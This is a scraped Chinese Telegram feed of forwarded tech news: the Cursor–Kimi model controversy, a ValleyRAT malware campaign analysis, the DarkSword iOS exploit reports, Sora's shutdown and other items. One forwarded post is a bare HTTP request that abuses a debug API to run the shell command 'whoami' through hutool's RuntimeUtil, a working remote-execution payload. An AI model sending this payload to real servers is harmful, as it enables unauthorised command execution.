cursor基于kimi k2.5微调模型且没有注明,被发现了还在顾左右而言他
结果kimi今天凌晨帮他们官宣了
https://x.com/leerob/status/2035035355364081694
https://x.com/Kimi_Moonshot/status/2035074972943831491
结果kimi今天凌晨帮他们官宣了
https://x.com/leerob/status/2035035355364081694
https://x.com/Kimi_Moonshot/status/2035074972943831491
🧵 Thread • FixupX
Lee Robinson (@leerob)
Yep, Composer 2 started from an open-source base! We will do full pretraining in the future.
Only ~1/4 of the compute spent on the final model came from the base, the rest is from our training. This is why evals are very different.
And yes, we are following…
Only ~1/4 of the compute spent on the final model came from the base, the rest is from our training. This is why evals are very different.
And yes, we are following…
还有一个疑点是cursor好像直接拿到了base模型进行训练,kimi也同时确认了他们有授权
cursor连授权都拿到了却连提一嘴kimi都不愿意,能骗得了谁
cursor连授权都拿到了却连提一嘴kimi都不愿意,能骗得了谁
Forwarded from Eternal_安全内参
POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 14
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
[["whoami"]]
Forwarded from LoopDNS资讯播报
银狐木马疑似在 Telegram 不同主题群组中批量传播
近期,我们持续接收到多份来自 Telegram 群组场景的可疑样本。尽管这些样本在文件命名、内容伪装和社工主题上各不相同,但其执行链、下载逻辑、侧载方式、持久化痕迹及通信配置高度一致,显示出明显的工程化投递特征。结合投稿来源和样本比对结果研判,这是一轮疑似由银狐相关团伙面向不同主题 Telegram 群组实施的批量化定向投递活动。本文将围绕该批样本的攻击流程、持久化机制、网络伪装与家族指纹展开分析,并结合 Winos4 / ValleyRAT 特征进行关联研判,为安全防护与事件响应提供参考。
阅读全文
近期,我们持续接收到多份来自 Telegram 群组场景的可疑样本。尽管这些样本在文件命名、内容伪装和社工主题上各不相同,但其执行链、下载逻辑、侧载方式、持久化痕迹及通信配置高度一致,显示出明显的工程化投递特征。结合投稿来源和样本比对结果研判,这是一轮疑似由银狐相关团伙面向不同主题 Telegram 群组实施的批量化定向投递活动。本文将围绕该批样本的攻击流程、持久化机制、网络伪装与家族指纹展开分析,并结合 Winos4 / ValleyRAT 特征进行关联研判,为安全防护与事件响应提供参考。
阅读全文
Telegraph
疑似银狐针对不同主题 Telegram 群组实施批量化社工投递的 Winos4/ValleyRAT 木马活动分析
概述 近期,我们频道的技术团队连续接到多起可疑样本投稿。投稿样本虽然在外层文件命名、文件内容伪装和社工主题上存在差异,但在执行链、下载逻辑、落地路径、侧载方式和通信配置上表现出高度一致性。结合投稿来源信息研判,这批样本并非针对单一场景投放,而是疑似由同一黑产团伙根据不同群组主题进行批量定制分发。 现有线索显示,相关样本主要来自不同类型的 Telegram 聊天群、资源分享群和垂直兴趣群。攻击者疑似先批量获取目标群组并加入,再依据群组内容方向调整诱饵名称和文件包装形式,例如围绕影视资源、软件下载、工具分享…
Forwarded from 蓝点网订阅频道
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from [Patience Forever]
恶意软件也可以调用 Windows WLAN API 来枚举附近的无线接入点(AP)信息,然后通过 Google Geolocation API 获取大致的地理坐标。
https://x.com/realNyarime/status/2035287134375145516
Smoke Loader Drops Whiffy Recon Wi-Fi Scanning and Geolocation Malware
https://x.com/realNyarime/status/2035287134375145516
Smoke Loader Drops Whiffy Recon Wi-Fi Scanning and Geolocation Malware
X (formerly Twitter)
奶昔🥤 (@realNyarime) on X
原来台式机没有GPS模块也能靠WiFi定位?我访问了北京竞心科技有限公司的LBS仓库(https://t.co/EldgZahgWx),根据自己的相关信息查询了下,得到的结果相当精准!
Forwarded from 科技圈🎗在花频道📮
元宇宙所谓“地产”价格崩溃,平均下跌 72%,最高跌幅超过 99%
2021 至 2022 年元宇宙热潮期间,各平台虚拟地块以天价成交,而如今绝大多数已跌至历史高点的零头。CoinGecko 数据显示,截至 2024 年 6 月,元宇宙平均地价已较峰值下跌 72%,其中 The Sandbox 跌幅达 95%、Decentraland 跌 89%、Otherdeed for Otherside 跌 85%。
例如 2021 年紧邻 Snoop Dogg 地产的 Snoopverse 庄园以约 45 万美元成交,当前底价折算仅剩约 1025 美元,跌幅 99.8%;Meta 旗下 Reality Labs 在 2025 年单年亏损高达 191.2 亿美元。
TechStory
🌸 在花频道|茶馆讨论|投稿通道
2021 至 2022 年元宇宙热潮期间,各平台虚拟地块以天价成交,而如今绝大多数已跌至历史高点的零头。CoinGecko 数据显示,截至 2024 年 6 月,元宇宙平均地价已较峰值下跌 72%,其中 The Sandbox 跌幅达 95%、Decentraland 跌 89%、Otherdeed for Otherside 跌 85%。
例如 2021 年紧邻 Snoop Dogg 地产的 Snoopverse 庄园以约 45 万美元成交,当前底价折算仅剩约 1025 美元,跌幅 99.8%;Meta 旗下 Reality Labs 在 2025 年单年亏损高达 191.2 亿美元。
TechStory
🌸 在花频道|茶馆讨论|投稿通道
Forwarded from K4YT3X's Channel (K4YT3X)
还记得 PewDiePie 去年装了个 Arch 么,我刚刚看了一眼,在过去的几个月里,他:
把浏览器换成了 Firefox、默认搜索引擎换成了 DDG、装了 GrapheneOS、自己在 RPi 上 host VaultWarden、在 Steam Deck 上 self host Joplin、从 Google Photo 换成了 Nextcloud 还配置了 Cloudflare Zero Trust、把 Google TV 换成了 Kodi……(根本写不下)
https://www.youtube.com/watch?v=u_Lxkt50xOg
自己用 RPi Zero、3D 打印外壳和 GPIO 摄像头做了个实时监控看自己车里的狗,还有一个看天气的 Tamagochi(我没看完)
https://www.youtube.com/watch?v=pgeTa1PV_40
做了一台 7 块 RTX 4000 Ada 的超算,然后又加了 8 块华强北 48G 4090 D 做 Folding@home,还用 vLLM self host Qwen3 235B,vibe code 了 Web UI、RAG、联网搜索、深度研究、记忆,甚至还有个 AI 议会来投票决定最好的答案
https://www.youtube.com/watch?v=2JzOe1Hs26Q
https://www.youtube.com/watch?v=qw4fDU18RcU
然后他自己爬数据、合成数据、蒸馏、SFT 了一个 Qwen2.5 32B Coder,编程得分比 DS V2.5、Llama4 和 GPT-4.1 mini 还高(虽然不知道有多少水分不过还是很厉害了)
https://www.youtube.com/watch?v=aV4j5pXLP-I
Bro 🤯
Respect
把浏览器换成了 Firefox、默认搜索引擎换成了 DDG、装了 GrapheneOS、自己在 RPi 上 host VaultWarden、在 Steam Deck 上 self host Joplin、从 Google Photo 换成了 Nextcloud 还配置了 Cloudflare Zero Trust、把 Google TV 换成了 Kodi……(根本写不下)
https://www.youtube.com/watch?v=u_Lxkt50xOg
自己用 RPi Zero、3D 打印外壳和 GPIO 摄像头做了个实时监控看自己车里的狗,还有一个看天气的 Tamagochi(我没看完)
https://www.youtube.com/watch?v=pgeTa1PV_40
做了一台 7 块 RTX 4000 Ada 的超算,然后又加了 8 块华强北 48G 4090 D 做 Folding@home,还用 vLLM self host Qwen3 235B,vibe code 了 Web UI、RAG、联网搜索、深度研究、记忆,甚至还有个 AI 议会来投票决定最好的答案
https://www.youtube.com/watch?v=2JzOe1Hs26Q
https://www.youtube.com/watch?v=qw4fDU18RcU
然后他自己爬数据、合成数据、蒸馏、SFT 了一个 Qwen2.5 32B Coder,编程得分比 DS V2.5、Llama4 和 GPT-4.1 mini 还高(虽然不知道有多少水分不过还是很厉害了)
https://www.youtube.com/watch?v=aV4j5pXLP-I
Bro 🤯
Respect
⚡1🤯1
Forwarded from K4YT3X's Channel (K4YT3X)
So FTC just legalized collecting and disclosing data from children under 13, in the name of "protecting the children"
What the fuck America, what the fuck
https://www.ftc.gov/news-events/news/press-releases/2026/02/ftc-issues-coppa-policy-statement-incentivize-use-age-verification-technologies-protect-children
https://www.youtube.com/watch?v=4s0tJ2yVCFc
What the fuck America, what the fuck
https://www.ftc.gov/news-events/news/press-releases/2026/02/ftc-issues-coppa-policy-statement-incentivize-use-age-verification-technologies-protect-children
https://www.youtube.com/watch?v=4s0tJ2yVCFc
Forwarded from LoopDNS资讯播报
张雪峰微博账号发布讣告
讣告
我们怀着无比沉痛的心情,向所有关心张雪峰老师的各界朋友告知:
亲爱的张雪峰老师,因心源性猝死全力抢救无效,于2026年3月24日15时50分在苏州逝世。
张雪峰老师出身寒门,一生心系广大学子,深耕教育行业,始终以捐资助学、助力学子成长为己任,以赤诚之心践行教育理想,嘉言懿行,启迪后人。
特此讣告,深切哀悼。
苏州峰学蔚来教育科技有限公司 2026年3月24日
🙏4🤣2
Forwarded from 每日消费电子观察 (septs)
谷歌威胁情报小组曝光 DarkSword 漏洞 用于监控iOS设备和窃取各类敏感资料
https://www.landiannews.com/archives/112253.html
https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain (英文)
DarkSword 属于纯 JavaScript 实现的零点击全链路漏洞利用,支持 iOS 18.4~iOS 18.7,其特点在于无需绕过 iOS PPL 或 SPTM 安全机制即可实现从网页到内核权限的全流程攻击。
也就是说攻击者只需要诱导用户访问特定钓鱼网站 (例如通过钓鱼邮件甚至直接在搜索引擎上投放针对性的广告),那就可以直接接管 iOS 设备并实现实时监控和数据窃取。
https://www.landiannews.com/archives/112253.html
https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain (英文)
DarkSword 属于纯 JavaScript 实现的零点击全链路漏洞利用,支持 iOS 18.4~iOS 18.7,其特点在于无需绕过 iOS PPL 或 SPTM 安全机制即可实现从网页到内核权限的全流程攻击。
也就是说攻击者只需要诱导用户访问特定钓鱼网站 (例如通过钓鱼邮件甚至直接在搜索引擎上投放针对性的广告),那就可以直接接管 iOS 设备并实现实时监控和数据窃取。
👍1
Forwarded from 每日消费电子观察 (无羽の翼 (「 • ̀ω•́ )「)
TechCrunch
Someone has publicly leaked an exploit kit that can hack millions of iPhones
Leaked "DarkSword" exploits published to GitHub allow hackers and cybercriminals to target iPhone users running old versions of iOS with spyware, according to cybersecurity researchers.
Forwarded from bupt.moe
Forwarded from 每日消费电子观察 (无羽の翼 (「 • ̀ω•́ )「)
OpenAI 将逐步关停 Sora AI 视频服务
https://www.cls.cn/detail/2323711
iOS 应用、API 接口以及 Sora.com 网站服务都将关闭,并且也不再在ChatGPT中支持视频功能。
通过将计算资源从Sora中转移出来,OpenAI可以将这些算力重新分配到利润更丰厚的代码生成、推理或文本生成任务中。
https://www.cls.cn/detail/2323711
财联社
什么情况?OpenAI 重大逆转:旗下Sora AI视频应用将终止服务
①OpenAI 周二宣布,将停止运营其曾风靡一时的Sora AI视频应用。 ②该公司表示,此举旨在聚焦业务重心,并优化人力与算力资源配置。 ③这一举措标志着Sora项目的重大逆转。